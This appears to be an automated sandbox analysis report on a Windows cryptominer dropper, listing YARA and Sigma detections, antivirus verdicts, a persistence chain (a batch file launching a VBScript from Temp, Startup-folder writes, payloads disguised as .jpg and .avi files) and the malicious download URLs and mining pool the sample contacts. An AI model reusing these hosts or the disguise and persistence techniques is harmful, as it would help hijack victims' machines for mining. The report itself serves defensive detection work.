0.0.K4gsPJGEi4.exe.8bfd60.4.raw.unpack	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x132c18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
0.0.K4gsPJGEi4.exe.8bc490.2.raw.unpack	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x1364e8:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
0.0.K4gsPJGEi4.exe.7b66bc.1.raw.unpack	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x23c2bc:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
0.0.K4gsPJGEi4.exe.8bfd60.4.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
0.0.K4gsPJGEi4.exe.8bfd60.4.unpack	Linux_Trojan_Pornoasset_927f314f	unknown	unknown	0x132c18:$a: C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48
0.0.K4gsPJGEi4.exe.8bfd60.4.unpack	MacOS_Cryptominer_Xmrig_241780a1	unknown	unknown	0x60b529:$a1: mining.set_target 0x5fd2ca:$a2: XMRIG_HOSTNAME 0x5ffed8:$a3: Usage: xmrig [OPTIONS] 0x5fd2a4:$a4: XMRIG_VERSION
0.0.K4gsPJGEi4.exe.8bfd60.4.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0x654cc8:$x1: donate.ssl.xmrig.com 0x655199:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume 0x6e61c3:$s2: \\?\pipe\uv\%p-%lu
0.0.K4gsPJGEi4.exe.8bfd60.4.unpack	MALWARE_Win_CoinMiner02	Detects coinmining malware	ditekSHen	0x656348:$s1: %s/%s (Windows NT %lu.%lu 0x65a9c8:$s3: \\.\WinRing0_ 0x601f42:$s4: pool_wallet 0x5fc770:$s5: cryptonight 0x5fc77e:$s5: cryptonight 0x5fc78d:$s5: cryptonight 0x5fc79b:$s5: cryptonight 0x5fc7b0:$s5: cryptonight 0x5fc7bf:$s5: cryptonight 0x5fc7cd:$s5: cryptonight 0x5fc7e2:$s5: cryptonight 0x5fc7f1:$s5: cryptonight 0x5fc802:$s5: cryptonight 0x5fc819:$s5: cryptonight 0x5fc827:$s5: cryptonight 0x5fc835:$s5: cryptonight 0x5fc845:$s5: cryptonight 0x5fc857:$s5: cryptonight 0x5fc868:$s5: cryptonight 0x5fc878:$s5: cryptonight 0x5fc888:$s5: cryptonight
Click to see the 5 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\K4gsPJGEi4.exe, ProcessId: 3652, TargetFilename: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\SysWOW64\wbem\WMIC.exe, SourceProcessId: 1992, StartAddress: 76D1D700, TargetImage: C:\Windows\SysWOW64\cmd.exe, TargetProcessId: 1992

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5492, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , ProcessId: 5312, ProcessName: wscript.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5492, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , ProcessId: 5312, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5492, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , ProcessId: 5312, ProcessName: wscript.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4296, TargetFilename: C:\Users\Public\Music

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 4296, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\d.txt

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: C:\Windows\System32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\Start.cmd", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5492, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\est1.vbs" , ProcessId: 5312, ProcessName: wscript.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: K4gsPJGEi4.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\IntelSvc.exe	Avira: detection malicious, Label: TR/Redcap.mzcqf
Source: C:\ProgramData\IntelSvc.exe	Avira: detection malicious, Label: TR/Redcap.mzcqf
Source: C:\ProgramData\IntelSvc.exe	Avira: detection malicious, Label: TR/Redcap.mzcqf
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt	Avira: detection malicious, Label: TR/CoinMiner.cywuh
Source: C:\Users\user\AppData\Local\Temp\Start.cmd	Avira: detection malicious, Label: BAT/Dldr.Agent.VPC
Source: C:\Users\user\AppData\Local\Temp\Systemfont.exe	Avira: detection malicious, Label: HEUR/AGEN.1320122
Source: C:\Users\Public\RtkAudio.exe	Avira: detection malicious, Label: TR/CoinMiner.cywuh
Source: C:\Users\user\AppData\Local\Temp\Systemfont.txt	Avira: detection malicious, Label: HEUR/AGEN.1320122
Source: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg	Avira: detection malicious, Label: TR/Redcap.mzcqf
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	Avira: detection malicious, Label: TR/CoinMiner.cywuh
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg	Avira: detection malicious, Label: HEUR/AGEN.1320122
Source: C:\Users\Public\RtkAudio.exe	Avira: detection malicious, Label: TR/CoinMiner.cywuh
Source: C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe	Avira: detection malicious, Label: TR/Redcap.mzcqf
Source: C:\Users\Public\RtkAudio.exe	Avira: detection malicious, Label: TR/CoinMiner.cywuh
Source: C:\ProgramData\IntelSvc.exe	Avira: detection malicious, Label: TR/Redcap.mzcqf

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\IntelSvc.exe	ReversingLabs: Detection: 79%
Source: C:\ProgramData\cmdow.exe	ReversingLabs: Detection: 39%
Source: C:\Users\Public\IntelSvc.exe	ReversingLabs: Detection: 79%
Source: C:\Users\Public\RtkAudio.exe	ReversingLabs: Detection: 83%
Source: C:\Users\Public\cmdow.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\IntelSvc.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\Systemfont.exe	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\Systemfont.txt	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\Tfile\IntelSvc.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\Tfile\RtkAudio.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg	ReversingLabs: Detection: 63%
Source: C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpg	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\cmdow.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\tv_x86.exe	ReversingLabs: Detection: 79%
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	ReversingLabs: Detection: 47%
Source: C:\Windows\SysWOW64\en\Au.avi	ReversingLabs: Detection: 83%
Source: C:\Windows\SysWOW64\en\In.avi	ReversingLabs: Detection: 79%
Source: C:\Windows\SysWOW64\en\Sy.avi	ReversingLabs: Detection: 63%
Source: C:\Windows\SysWOW64\en\cm.avi	ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.7% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\screen.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\screen.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt	Joe Sandbox ML: detected
Source: C:\Users\Public\RtkAudio.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpg	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg	Joe Sandbox ML: detected
Source: C:\Users\Public\RtkAudio.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\RtkAudio.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: K4gsPJGEi4.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: K4gsPJGEi4.exe, type: SAMPLE
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.2137379711.0000000000EB9000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K4gsPJGEi4.exe PID: 3652, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Start.cmd, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\two.cmd, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RtkAudio.txt, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg, type: DROPPED
Source: Yara match	File source: C:\Windows\SysWOW64\en\Au.avi, type: DROPPED
Source: Yara match	File source: C:\Users\Public\RtkAudio.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\RtkAudio.exe, type: DROPPED
Source: Yara match	File source: C:\Users\Public\RtkAudio.exe, type: DROPPED

Found strings related to Crypto-Mining

Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: K4gsPJGEi4.exe, 00000000.00000003.2159430929.000000000349C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]

Source: K4gsPJGEi4.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source:	Binary string: aeroadmin.pdb source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.dr
Source:	Binary string: aeroadmin.pdbXu source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr

Source: K4gsPJGEi4.exe, 00000000.00000003.2150416482.0000000002D34000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
Source: K4gsPJGEi4.exe, 00000000.00000003.2150416482.0000000002D34000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.000000000041A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
Source: K4gsPJGEi4.exe, 00000000.00000000.2137379711.000000000041A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: [autorun]
Source: K4gsPJGEi4.exe	Binary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
Source: K4gsPJGEi4.exe	Binary or memory string: [autorun]
Source: cmdow.exe0.15.dr	Binary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
Source: cmdow.exe0.15.dr	Binary or memory string: [autorun]
Source: cmdow.exe.15.dr	Binary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
Source: cmdow.exe.15.dr	Binary or memory string: [autorun]
Source: cm.avi.15.dr	Binary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
Source: cm.avi.15.dr	Binary or memory string: [autorun]
Source: cmdo.jpg.15.dr	Binary or memory string: Copy CMDOW.EXE to the CD and create an autorun.inf file. Here is a sample:-
Source: cmdo.jpg.15.dr	Binary or memory string: [autorun]

Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_004024C1 FindFirstFileA,FindNextFileA,FindClose,		18_2_004024C1
Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_004030D0 FindFirstFileA,FindNextFileA,strlen,strlen,		18_2_004030D0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: auth11.aeroadmin.com
Source: global traffic	DNS traffic detected: DNS query: auto.c3pool.org

Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://900100.net
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.dr	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.dr	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.dr	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.dr	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://nircmd.nirsoft.net
Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://nircmd.nirsoft.net/%s.html
Source: screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://nircmd.nirsoft.net/%s.htmlhttp://nircmd.nirsoft.net
Source: K4gsPJGEi4.exe, RuntimeBroker.exe.0.dr	String found in binary or memory: http://nssm.cc/h
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	String found in binary or memory: http://sancovat.com/Website1/All/FixT3N24.txt
Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	String found in binary or memory: http://sancovat.com/Website1/All/recoverview.txt
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: http://www.aeroadmin.com/warning_btn_buylimit_titleback_warning_buy/index.html?src=aa_/buy.html?src=
Source: K4gsPJGEi4.exe, cmdow.exe0.15.dr, cmdow.exe.15.dr, cm.avi.15.dr, cmdo.jpg.15.dr	String found in binary or memory: http://www.commandline.co.uk.
Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmp	String found in binary or memory: http://www.nirsoft.netopenIf
Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	String found in binary or memory: http://xemhang.vn/Website1/All/FixT3N24.txt
Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	String found in binary or memory: http://xemhang.vn/Website1/All/recoverdv.txt
Source: K4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.dr	String found in binary or memory: http://xemhang.vn/Website1/All/recoverview.txt
Source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr	String found in binary or memory: https://ulm.aeroadmin.com/build_numberCould
Source: In.avi.15.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: K4gsPJGEi4.exe, RtkAudio.txt.0.dr	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: K4gsPJGEi4.exe, RtkAudio.txt.0.dr	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: K4gsPJGEi4.exe, RtkAudio.txt.0.dr	String found in binary or memory: https://xmrig.com/wizard
Source: K4gsPJGEi4.exe, RtkAudio.txt.0.dr	String found in binary or memory: https://xmrig.com/wizard%s

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_00402057 GetObjectA,GetDC,CreateDIBitmap,ReleaseDC,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteObject,

18_2_00402057

Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_00402057 GetObjectA,GetDC,CreateDIBitmap,ReleaseDC,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,DeleteObject,	18_2_00402057
Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_004018A1 memset,OpenClipboard,EmptyClipboard,RegisterClipboardFormatA,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,CloseHandle,	18_2_004018A1
Source: C:\Users\user\AppData\Local\Temp\screen.exe	Code function: 18_2_00402D57 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,	18_2_00402D57

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_00402CB5 GetClipboardData,GlobalFix,CreateFileA,SetFilePointer,CloseHandle,GlobalUnWire,CloseClipboard,

18_2_00402CB5

Source: C:\Users\user\AppData\Local\Temp\screen.exe

Code function: 18_2_0040D139 GetDC,GetDeviceCaps,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,atoi,atoi,atoi,atoi,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,BitBlt,_strcmpi,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SelectObject,DeleteDC,SelectObject,DeleteDC,DeleteObject,ReleaseDC,

18_2_0040D139

System Summary

Malicious sample detected (through community Yara rule)

Source: K4gsPJGEi4.exe, type: SAMPLE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: K4gsPJGEi4.exe, type: SAMPLE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: K4gsPJGEi4.exe, type: SAMPLE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: K4gsPJGEi4.exe, type: SAMPLE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.raw.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 0.0.K4gsPJGEi4.exe.8bc490.2.raw.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 0.0.K4gsPJGEi4.exe.7b66bc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE	Matched rule: Linux_Trojan_Pornoasset_927f314f Author: unknown
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 0.0.K4gsPJGEi4.exe.8bfd60.4.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
